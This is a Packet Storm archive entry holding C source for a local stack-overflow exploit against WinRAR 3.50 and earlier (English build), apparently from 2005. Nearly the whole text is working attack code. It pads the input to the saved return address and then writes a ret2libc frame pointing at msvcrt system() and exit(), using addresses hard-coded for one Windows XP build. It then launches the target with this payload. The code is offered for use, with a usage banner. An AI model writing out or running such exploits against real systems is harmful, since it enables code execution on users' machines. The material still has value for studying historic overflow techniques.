winrar-3.50-eng.txt

2005-10-18T00:00:00
ID PACKETSTORM:40784
Type packetstorm
Reporter edward11
Modified 2005-10-18T00:00:00

Description

                                        
/*
 * Local exploit for WinRAR <= 3.50 (English build).
 *
 * The bug was unpublished (0day) when this was written.
 *
 * Technique: return-to-function (ret2libc). The saved return address is
 * overwritten with the address of msvcrt system(), followed by the address
 * of exit() as system()'s own return address, followed by the value that
 * becomes system()'s single argument (cmd_addr). The three addresses are
 * hard-coded for one msvcrt.dll build, so the exploit must be re-targeted
 * for any other Windows build.
 */
  
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
  
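/* Sizes of the payload and of the command-line scratch buffer. */
enum {
	PAD_LEN = 516,      /* filler bytes preceding the saved return address */
	PAYLOAD_CAP = 3000, /* capacity of the payload buffer                   */
	CMD_BUF_LEN = 3000  /* capacity of the command line handed to system()  */
};

/*
 * Append one 32-bit address, little-endian (x86 target), to the payload
 * string in buf, keeping it NUL-terminated.
 *
 * The payload travels through sprintf()/system() as a C string, so any
 * zero byte inside an address would silently truncate everything after
 * it. Returns 0 on success, -1 if the address contains a zero byte or
 * the buffer is full.
 */
static int append_addr(unsigned char *buf, size_t cap, size_t *len, uint32_t addr)
{
	unsigned char raw[4];

	if (*len + sizeof raw >= cap) {
		return -1;
	}
	for (size_t i = 0; i < sizeof raw; i++) {
		raw[i] = (unsigned char)((addr >> (8 * i)) & 0xFF);
		if (raw[i] == 0) {
			return -1;
		}
	}
	memcpy(buf + *len, raw, sizeof raw);
	*len += sizeof raw;
	buf[*len] = '\0';
	return 0;
}

/*
 * Build the overflow payload and launch the target with it as argument.
 *
 * argv[1] is the path to the RAR/WinRAR binary. Exit status is 0 when the
 * target was launched, non-zero on usage error, on a payload that cannot
 * be carried in a C string, or when the command line does not fit.
 */
int main(int argc, char *argv[])
{
	/*
	 * Return addresses for one specific msvcrt.dll build (per the original
	 * author: Windows XP SP0). They are invalid on any other build and
	 * must be replaced to re-target the exploit.
	 */
	const uint32_t sys_addr  = 0x77C18044; /* system()                          */
	const uint32_t exit_addr = 0x77C27ADC; /* exit(): where system() returns to */
	const uint32_t cmd_addr  = 0x77C01335; /* system()'s argument -- presumably a
	                                          pointer to a "cmd" string; verify */

	unsigned char buf[PAYLOAD_CAP];
	char cmd[CMD_BUF_LEN];
	size_t len = 0;

	if (argc < 2 || argv[1][0] == '\0') {
		printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version *\n * * usage: 0xletzdance.exe <path_to_RAR>\n\n");
		return EXIT_FAILURE;
	}

	/* Filler up to the saved return address; 0x55 carries no NUL byte. */
	memset(buf, 0x55, PAD_LEN);
	len = PAD_LEN;
	buf[len] = '\0';

	/* ret2func frame: [ &system ][ &exit as return ][ arg0 ] */
	if (append_addr(buf, sizeof buf, &len, sys_addr) != 0 ||
	    append_addr(buf, sizeof buf, &len, exit_addr) != 0 ||
	    append_addr(buf, sizeof buf, &len, cmd_addr) != 0) {
		fprintf(stderr, "error: a return address contains a NUL byte; the payload would be truncated\n");
		return EXIT_FAILURE;
	}

	/*
	 * argv[1] is passed unquoted to the command interpreter: a path with
	 * spaces or shell metacharacters will be split or interpreted. This is
	 * operator-supplied input, not a trust boundary, but quote it yourself.
	 */
	int n = snprintf(cmd, sizeof cmd, "%s %s", argv[1], (const char *)buf);
	if (n < 0 || (size_t)n >= sizeof cmd) {
		fprintf(stderr, "error: command line too long\n");
		return EXIT_FAILURE;
	}

	if (system(cmd) == -1) {
		perror("system");
		return EXIT_FAILURE;
	}
	return EXIT_SUCCESS;
}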